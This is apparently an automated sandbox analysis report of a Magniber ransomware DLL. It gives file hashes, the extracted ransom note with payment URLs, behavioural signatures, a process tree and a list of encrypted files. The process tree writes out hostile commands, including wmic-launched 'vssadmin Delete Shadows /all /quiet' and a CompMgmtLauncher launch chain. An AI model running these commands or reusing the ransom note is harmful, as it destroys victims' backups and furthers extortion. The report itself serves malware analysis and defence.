Resubmissions

19-08-2021 01:57

210819-7xxlq9brfj 10

18-08-2021 02:00

210818-eve5hlsnke 10

Analysis

  • max time kernel
    114s
  • max time network
    71s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    18-08-2021 02:00

General

  • Target

    22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll

  • Size

    21KB

  • MD5

    f9147aeda18f71043955420e853b8d3c

  • SHA1

    a9c6995a91ac8ac6c76379fd38c3fb973273d3b3

  • SHA256

    22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51

  • SHA512

    3e38ce57ada7a3fc22c2caf6a882574427c3d0b73cbfc337853017995f27688a5f344157f893f1a70cec2ced15a4a553010031b54e813cacb430670ecd8c251f

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here: http://f4ec0478e6784a70d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt
http://f4ec0478e6784a70d2dgvzumt.partscs.site/dgvzumt
http://f4ec0478e6784a70d2dgvzumt.uponmix.xyz/dgvzumt
http://f4ec0478e6784a70d2dgvzumt.flysex.space/dgvzumt
Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f4ec0478e6784a70d2dgvzumt.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.partscs.site/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.uponmix.xyz/dgvzumt

http://f4ec0478e6784a70d2dgvzumt.flysex.space/dgvzumt

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
  • Modifies registry class 14 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 47 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:616
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\22c59e19315ba81452b67c271d46980fac9bc1e6082bed6efcc270e669479d51.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1980
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1140
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1552
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:1780
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\MergeInstall.hta"
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        PID:2884
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1112
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1056
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt^&1^&43704893^&80^&369^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://f4ec0478e6784a70d2dgvzumt.codehes.uno/dgvzumt&1&43704893&80&369&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:924 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:928
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:924 CREDAT:275469 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:2764
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1644
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2060
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1224
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:824
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2052
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:868
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:948
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2068
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:1980
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:336
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2076
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2280
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2292
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2316
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2348
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:2432

              Downloads

              • C:\Users\Admin\Desktop\AddUnprotect.avi.dgvzumt

              • C:\Users\Admin\Desktop\CloseUnlock.dwg.dgvzumt

              • C:\Users\Admin\Desktop\CompleteResolve.tiff.dgvzumt

              • C:\Users\Admin\Desktop\ConnectWait.bmp.dgvzumt

              • C:\Users\Admin\Desktop\DismountHide.xlsm.dgvzumt

              • C:\Users\Admin\Desktop\JoinSplit.emf.dgvzumt

              • C:\Users\Admin\Desktop\OpenResume.xlsx.dgvzumt

              • C:\Users\Admin\Desktop\SubmitExit.ppt.dgvzumt

              • C:\Users\Admin\Desktop\SwitchPop.mov.dgvzumt

              • C:\Users\Admin\Desktop\UnblockUnprotect.zip.dgvzumt

              • C:\Users\Admin\Desktop\readme.txt

              • C:\Users\Public\readme.txt

